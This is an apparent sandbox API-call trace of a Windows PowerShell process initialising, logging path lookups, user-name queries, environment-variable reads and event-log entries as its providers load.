	[0415.975] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0415.975] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0415.975] CoTaskMemFree (pv=0x1ed820) 
	[0415.976] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xccfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0415.976] SetErrorMode (uMode=0x1) returned 0x1
	[0415.976] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xcd1e0 | out: lpFileInformation=0xcd1e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0415.976] SetErrorMode (uMode=0x1) returned 0x1
	[0415.977] GetLogicalDrives () returned 0x4
	[0415.978] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccd40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0415.978] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0415.978] SetErrorMode (uMode=0x1) returned 0x1
	[0415.979] CoTaskMemAlloc (cb=0x68) returned 0x200530
	[0415.979] CoTaskMemAlloc (cb=0x68) returned 0x2004c0
	[0415.979] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x200530, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xcd1b0, lpMaximumComponentLength=0xcd1ac, lpFileSystemFlags=0xcd1a8, lpFileSystemNameBuffer=0x2004c0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xcd1b0*=0x9c354b42, lpMaximumComponentLength=0xcd1ac*=0xff, lpFileSystemFlags=0xcd1a8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0415.979] CoTaskMemFree (pv=0x200530) 
	[0415.979] CoTaskMemFree (pv=0x2004c0) 
	[0415.979] SetErrorMode (uMode=0x1) returned 0x1
	[0415.979] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0415.980] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0415.980] SetErrorMode (uMode=0x1) returned 0x1
	[0415.980] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd150 | out: lpFileInformation=0xcd150*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0415.980] SetErrorMode (uMode=0x1) returned 0x1
	[0415.980] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0415.980] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccda0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0415.980] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0415.981] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcccd0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0415.981] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0415.982] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccd20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0415.982] SetErrorMode (uMode=0x1) returned 0x1
	[0415.982] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xccf80 | out: lpFileInformation=0xccf80*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0415.982] SetErrorMode (uMode=0x1) returned 0x1
	[0415.982] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccd20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0415.982] SetErrorMode (uMode=0x1) returned 0x1
	[0415.982] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xccf80 | out: lpFileInformation=0xccf80*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0415.983] SetErrorMode (uMode=0x1) returned 0x1
	[0415.983] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0415.983] SetErrorMode (uMode=0x1) returned 0x1
	[0415.983] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd020 | out: lpFileInformation=0xcd020*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0415.983] SetErrorMode (uMode=0x1) returned 0x1
	[0415.983] CoTaskMemAlloc (cb=0x804) returned 0x1b784da0
	[0415.983] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b784da0, nSize=0xcd428 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd428) returned 0x1
	[0415.984] CoTaskMemFree (pv=0x1b784da0) 
	[0415.984] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.984] GetUserNameW (in: lpBuffer=0x194120, pcbBuffer=0xcd468 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd468) returned 1
	[0415.985] CoTaskMemFree (pv=0x194120) 
	[0415.985] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dd7420*="FileSystem", lpRawData=0x2dd71b0) returned 1
	[0415.998] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0415.998] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.998] CoTaskMemFree (pv=0x1ed820) 
	[0416.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.000] CoTaskMemAlloc (cb=0x804) returned 0x1b784da0
	[0416.000] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b784da0, nSize=0xcd428 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd428) returned 0x1
	[0416.001] CoTaskMemFree (pv=0x1b784da0) 
	[0416.001] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0416.001] GetUserNameW (in: lpBuffer=0x194120, pcbBuffer=0xcd468 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd468) returned 1
	[0416.001] CoTaskMemFree (pv=0x194120) 
	[0416.002] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ddcc60*="Function", lpRawData=0x2ddc9f0) returned 1
	[0416.010] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0416.010] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0416.010] CoTaskMemFree (pv=0x1ed820) 
	[0416.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.410] CoTaskMemAlloc (cb=0x804) returned 0x1b784da0
	[0416.410] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b784da0, nSize=0xcd428 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd428) returned 0x1
	[0416.747] CoTaskMemFree (pv=0x1b784da0) 
	[0416.747] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0416.747] GetUserNameW (in: lpBuffer=0x194120, pcbBuffer=0xcd468 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd468) returned 1
	[0416.747] CoTaskMemFree (pv=0x194120) 
	[0416.748] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dff488*="Registry", lpRawData=0x2dff218) returned 1
	[0417.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0417.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0417.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0417.059] CoTaskMemAlloc (cb=0x804) returned 0x1b784da0
	[0417.059] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b784da0, nSize=0xcd428 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd428) returned 0x1
	[0417.059] CoTaskMemFree (pv=0x1b784da0) 
	[0417.059] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0417.059] GetUserNameW (in: lpBuffer=0x194120, pcbBuffer=0xcd468 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd468) returned 1
	[0417.060] CoTaskMemFree (pv=0x194120) 
	[0417.062] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e048a0*="Variable", lpRawData=0x2e04630) returned 1
	[0417.102] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0417.102] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.102] CoTaskMemFree (pv=0x1ed820) 
	[0417.106] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0417.106] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.106] CoTaskMemFree (pv=0x1ed820) 
	[0417.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0417.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xccc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0417.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xccc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0417.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xccc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0417.423] CoTaskMemAlloc (cb=0x804) returned 0x1b784da0
	[0417.423] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b784da0, nSize=0xcd428 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd428) returned 0x1
	[0417.424] CoTaskMemFree (pv=0x1b784da0) 
	[0417.424] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0417.424] GetUserNameW (in: lpBuffer=0x194120, pcbBuffer=0xcd468 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd468) returned 1
	[0417.424] CoTaskMemFree (pv=0x194120) 
	[0417.424] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e184b8*="Certificate", lpRawData=0x2e18248) returned 1
	[0417.517] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0417.517] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.517] CoTaskMemFree (pv=0x1ed820) 
	[0417.521] GetLogicalDrives () returned 0x4
	[0417.521] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0417.521] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0417.537] CoTaskMemAlloc (cb=0x20e) returned 0x1eb530
	[0417.537] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1eb530 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0417.537] CoTaskMemFree (pv=0x1eb530) 
	[0417.539] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0417.539] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.539] CoTaskMemFree (pv=0x1ed820) 
	[0417.539] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0417.539] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.539] CoTaskMemFree (pv=0x1ed820) 
	[0417.556] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0417.556] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.556] CoTaskMemFree (pv=0x1ed820) 
	[0417.557] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0417.557] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.557] CoTaskMemFree (pv=0x1ed820) 
	[0417.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.557] SetErrorMode (uMode=0x1) returned 0x1
	[0417.558] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd070 | out: lpFileInformation=0xcd070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0417.558] SetErrorMode (uMode=0x1) returned 0x1
	[0417.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.558] SetErrorMode (uMode=0x1) returned 0x1
	[0417.558] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd070 | out: lpFileInformation=0xcd070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0417.558] SetErrorMode (uMode=0x1) returned 0x1
	[0417.558] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0417.558] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.558] CoTaskMemFree (pv=0x1ed820) 
	[0417.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.564] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcce20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0417.564] SetErrorMode (uMode=0x1) returned 0x1
	[0417.564] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd030 | out: lpFileInformation=0xcd030*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0417.564] SetErrorMode (uMode=0x1) returned 0x1
	[0417.564] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcce20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0417.564] SetErrorMode (uMode=0x1) returned 0x1
	[0417.564] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd030 | out: lpFileInformation=0xcd030*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0417.565] SetErrorMode (uMode=0x1) returned 0x1
	[0417.565] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcce30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0417.565] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccd20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0417.565] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xcce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.565] SetErrorMode (uMode=0x1) returned 0x1
	[0417.565] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcd030 | out: lpFileInformation=0xcd030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0417.565] SetErrorMode (uMode=0x1) returned 0x1
	[0417.565] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xcce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.565] SetErrorMode (uMode=0x1) returned 0x1
	[0417.565] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcd030 | out: lpFileInformation=0xcd030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0417.565] SetErrorMode (uMode=0x1) returned 0x1
	[0417.566] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xcce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xccd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.566] SetErrorMode (uMode=0x1) returned 0x1
